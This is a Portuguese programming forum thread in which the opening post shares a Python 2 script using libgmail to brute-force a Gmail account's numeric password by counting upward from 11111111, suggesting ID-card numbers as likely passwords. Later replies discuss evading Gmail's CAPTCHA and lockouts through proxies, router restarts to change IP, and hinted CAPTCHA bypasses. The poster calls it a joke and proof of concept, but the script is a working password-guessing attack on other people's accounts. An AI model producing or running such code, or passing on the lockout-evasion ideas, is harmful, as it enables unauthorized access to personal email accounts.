• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

newbeen

Brute force Gmail :D - Brincadeira

12 mensagens neste tópico

Isto e mesmo brincadeira e peço desculpa se alguem achar que estou a incitar a algum tipo de pratica menos honesta......

apenas a titulo de curiosidade depois do post sobre a libgmail como prova de conceito.....

#############################################################################
# A titulo de brincadeira fica aqui uma versao rudimentar de um brute force #
# numerico, claro k podia ser melhorado com o uso de thread para varias     #
# ligacoes simultaneas e adicionar um ficheiro para lista de palavras pass  #
# mas assim nimguem vai ter a coragem de me dizer que isto e' materia       #
# impropria nem danosa, de tao simples e lento e apenas util se souberem k  #
# a palavra pass e' numerica e tem X numero de caracteres,  mas funciona    #
#############################################################################
import sys
import libgmail

class Login():

    def crack(self, acount, pw):
        self.ga=libgmail.GmailAccount(acount, pw)
        try:
            self.ga.login()
        
        except libgmail.GmailLoginFailure,e:
            print "\nPassword %i nao e correcta." %pw
            return 1

        else:
            print "Crakada a password para a conta: %s  e %i" %(acount, pw)
            return 0
    


acount = raw_input("Conta gmail: ")
pw=11111111 #por exemplo se souberem que a password e' um numero de bilhete de identidade e' um bom comeco este numero 
tenta=Login()
tentar=tenta.crack(acount, pw)

while tentar==1:
    pw=pw+1
    tentar=tenta.crack(acount, pw)


raw_input("Tarefa terminada prima kk tecla para sair...")

Fim... :smoke:

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Isso é giro, mas o gmail não cai nessa: ao fim de uns 10 ou 15 logins falhados pede uma captcha :thumbsup:

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Isso é giro, mas o gmail não cai nessa: ao fim de uns 10 ou 15 logins falhados pede uma captcha :(

Existem maneiras muito fáceis de contornar isso. :D

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Sim? Como?

Poder-se-ia usar proxy ou assim para fingir outros IPs, mas se eles associarem as tentativas ao utilizador, como é que se pode escapar?

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

IceBrain, pois, eu pensei nas proxies e tal, mas esqueci-me dessa última... :x My bad.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

há smp a possibilidade de arranjar um script pa reiniciar o router ao fim de X tentativas...lol

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Pois, mas voltas ao mesmo. Se eles associam ao utilizador como é? ;)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

hehe,.. está fine! ;)

Eu aqui há uns meses fim algo semelhante mas era para ser usado em foruns como o SMF. Deixei o codigo +- ao nivel desse, só o básico.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Existe ainda uma forma de controlar esse nivel de controlo, mas não convem deixar muito explicito o que tenho em mente.

Além disso existem exemplos de codigo com isso feito. Tal como tudo o software não é perfeito e de cabeça consigo pensar em pelo menos uma mão de maneiras de driblar a situação... Todas hipotéticas, nenhuma testada, e não faço intenções de testar nenhuma delas.

Gostei do algoritmo, mas acho que o deves deixar "as-is" porque neste momento já existem demasiados algoritmos desse genero disponiveis e nas mãos menos proprias possiveis :thumbsup:

Cumprimentos

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Como contornas um mecanismo que monitoriza tanto o utilizador como o IP? Passado X tempo vais inevitavelmente ter o captcha pela frente, e o captcha que eu sabia não dá para resolver programaticamente :x

Interesse meramente académico note-se..

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

As possibilidades que se me ocorreram foram meramente possibilidades, e volto a afirmar para que se note, não tenciono colocar nenhuma em pratica, e o meu interesse é apenas académico.

O lidar com o captcha exitem varias formas, o andar  usar proxies só funcionaria sem a captcha, mas quando tiver de lidar com ela existem maneiras de a explorar / contornar. Pensa "de traz para a frente" e diz-me a que conclusão chegas-te. Eu não gosto de comentar assuntos de segurança informática nos forums e gosto ainda menos de explicar em detalhe as hipoteses que se me ocorrem.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora